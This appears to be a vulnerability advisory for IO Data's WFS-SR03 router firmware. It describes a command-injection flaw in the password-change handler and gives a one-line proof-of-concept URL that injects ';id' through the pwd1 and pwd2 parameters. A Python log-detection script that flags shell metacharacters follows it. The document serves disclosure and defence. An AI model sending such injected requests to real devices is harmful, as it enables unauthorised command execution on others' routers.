IoData:WFS-SR03 v1.0.3(2022/11/14)
https://www.iodata.jp/lib/software/w/2176.htm
The ioos program listens on port 81 and is the interface to the router's processing functions.
The parameters of the sys_smb_pwdmod function in ioos are attacker-controllable, resulting in arbitrary command injection.
The parameters are taken from the HTTP request parameters. The function belongs to cgi_sys_pwdmod_handler, and the function name used when calling it through the URL is pwdmod.
PoC (authorization is required):
<http://127.0.0.1/protocol.csp?fname=system&opt=pwdmod&name=root&pwd1=;id&pwd2=;id&function=set>
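For defenders, a detection check for the request shape shown in the PoC, run over proxy or access-log request targets. This is an added example, not part of the original advisory or the vendor's code; the metacharacter set, the choice of watched fields and the sample request targets are constructed assumptions.

```python
from urllib.parse import urlsplit, unquote_plus

# Characters a shell treats specially; a password-change field carrying one
# is worth an alert (assumed policy for this example, not the vendor's).
SHELL_META = set(";|&`$(){}<>\n\r\\'\"")
WATCHED_FIELDS = ("name", "pwd1", "pwd2")


def parse_query(raw_query):
    """Split on '&' only, so a literal ';' stays inside its value."""
    params = {}
    for pair in raw_query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def suspicious_fields(request_target):
    """Return the watched pwdmod fields that carry shell metacharacters."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/protocol.csp"):
        return []
    params = parse_query(parts.query)
    if "system" not in params.get("fname", []) or "pwdmod" not in params.get("opt", []):
        return []
    return sorted(
        field
        for field in WATCHED_FIELDS
        if any(SHELL_META & set(value) for value in params.get(field, []))
    )


# Constructed request targets, as they would appear in a proxy or access log.
SAMPLE_TARGETS = [
    "/protocol.csp?fname=system&opt=pwdmod&name=root&pwd1=;id&pwd2=;id&function=set",
    "/protocol.csp?fname=system&opt=pwdmod&name=root&pwd1=%3Bid&pwd2=ok123&function=set",
    "/protocol.csp?fname=system&opt=pwdmod&name=root&pwd1=Xk29fa&pwd2=Xk29fa&function=set",
    "/index.html?pwd1=;id",
]

if __name__ == "__main__":
    for target in SAMPLE_TARGETS:
        print(suspicious_fields(target), target)
```

Values are URL-decoded before the check, so percent-encoded metacharacters are flagged as well; a legitimate password containing one of these characters will also alert and needs manual review.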